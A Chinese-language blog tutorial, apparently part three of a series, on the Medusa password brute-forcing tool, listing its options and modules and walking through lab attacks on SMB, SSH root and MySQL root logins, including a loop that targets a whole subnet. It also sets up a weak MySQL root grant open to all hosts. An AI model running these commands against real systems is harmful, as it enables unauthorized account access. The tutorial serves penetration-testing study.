暴力破解-medusa(三)

1.1 medusa介绍

medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登陆,可以同时对多个主机,用户或是密码执行强力测试,medusa和hydra一样,同样属于在线破解工具,不同的是medusa的稳定性相较于hydra要好很多,但是支持的模块相对于hydra少一些,其中Kali Linux中自带medusa。

1.2 medusa使用

1.2.1 下载medusa

https://github.com/jmk-foofus/medusa/

http://foofus.net/goons/jmk/medusa/medusa.html

1.2.2 medusa参数解释

-h [TEXT]:目标IP
-u [TEXT]:用户名
-P [FILE]:密码文件
-e [n/s/ns]:n意为空密码,s意为密码与用户名相同
-M [TEXT]:模块执行名称
-t [NUM]:设定线程数量
-F:破解到一个正确的密码即退出
-H [FILE]:目标主机文件
-U [FILE]:用户名文件
-p [TEXT]:密码
-C [FILE]:组合条目文件
-O [FILE]:文件日志信息
-m [TEXT]:传递参数到模块
-d:显示所有的模块名称
-n [NUM]:使用非默认端口
-s:启用SSL
-r [NUM]:重试间隔时间,默认为3秒
-L:并行化,每个用户使用一个线程
-f:在任何主机上找到第一个账号/密码后停止破解
-q:显示模块的使用信息
-v [NUM]:详细级别(0-6)
-w [NUM]:错误调试级别(0-10)
-V:显示版本
-Z [TEXT]:继续扫描上一次

1.2.3 medusa所有模块

# medusa -d
cvs.mod : Brute force module for CVS sessions : version 2.0
ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
http.mod : Brute force module for HTTP : version 2.1
imap.mod : Brute force module for IMAP sessions : version 2.0
mssql.mod : Brute force module for M$-SQL sessions : version 2.0
mysql.mod : Brute force module for MySQL sessions : version 2.0
nntp.mod : Brute force module for NNTP sessions : version 2.0
pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
pop3.mod : Brute force module for POP3 sessions : version 2.0
postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
rexec.mod : Brute force module for REXEC sessions : version 2.0
rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
rsh.mod : Brute force module for RSH sessions : version 2.0
smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
snmp.mod : Brute force module for SNMP Community Strings : version 2.1
ssh.mod : Brute force module for SSH v2 sessions : version 2.1
svn.mod : Brute force module for Subversion sessions : version 2.1
telnet.mod : Brute force module for telnet sessions : version 2.0
vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
vnc.mod : Brute force module for VNC sessions : version 2.1
web-form.mod : Brute force module for web forms : version 2.1
wrapper.mod : Generic Wrapper Module : version 2.0

1.3 实验环境

序号 主机IP 主机系统 主机角色
1 192.168.10.180 Kali 攻击机
2 192.168.10.129 Windows 10 64位 攻击机
3 192.168.10.156 Windows 7 32位 被攻击机
4 192.168.10.80 Centos 7 64位 被攻击机

1.4 实例:使用medusa破解系统用户名密码

1.4.1 破解win7文件共享密码

1.4.1.1 前期准备

参考《暴力破解-hydra》1.4.1章节

1.4.1.2 破解smb文件密码

# medusa -M smbnt -h 192.168.10.157 -e ns -F -u pm -P m.txt

图片[1]|暴力破解-medusa(三)|leon的博客

1.4.2 破解ssh服务root密码

1.4.2.1 前期准备

参考《暴力破解-hydra》1.4.3章节

1.4.2.2 破解ssh远程密码

# medusa -M ssh -h 192.168.10.80 -e ns -F -u root -P m.txt

图片[2]|暴力破解-medusa(三)|leon的博客

1.4.3 同时破解多台主机

host.txt文件中是目标主机名称或者IP地址,user.txt文件中指定需要暴力破解的用户名,字典使用”m.txt” ,使用8000进程同时暴力破解:

1.4.3.1 准备环境

# for i in {1..254};do echo "192.168.10.${i}" >> host.txt;done
# vim host.txt
192.168.10.156
192.168.10.157
192.168.10.80
# vim user.txt
pm
root
administrator

1.4.3.2 进行暴力破解

# medusa -M smbnt -H ./host.txt -U ./user.txt -P m.txt -t 8 -O ./smbnt.log
# cat smbnt.log

图片[3]|暴力破解-medusa(三)|leon的博客

1.4.4 破解mysql的root密码

1.4.4.1 准备环境

[root@test ~]# mysql -uroot –p123456
mysql> grant all on *.* to 'root'@'%' identified by '123456' with grant option;

1.4.4.2 进行暴力破解

# medusa -M mysql -h 192.168.10.80 -e ns -F -u root -P m.txt

图片[4]|暴力破解-medusa(三)|leon的博客

温馨提示:本文最后更新于2022-12-20 20:57:34,已超过464天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!
转载请注明本文链接:https://blog.leonshadow.cn/763482/2811.html
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享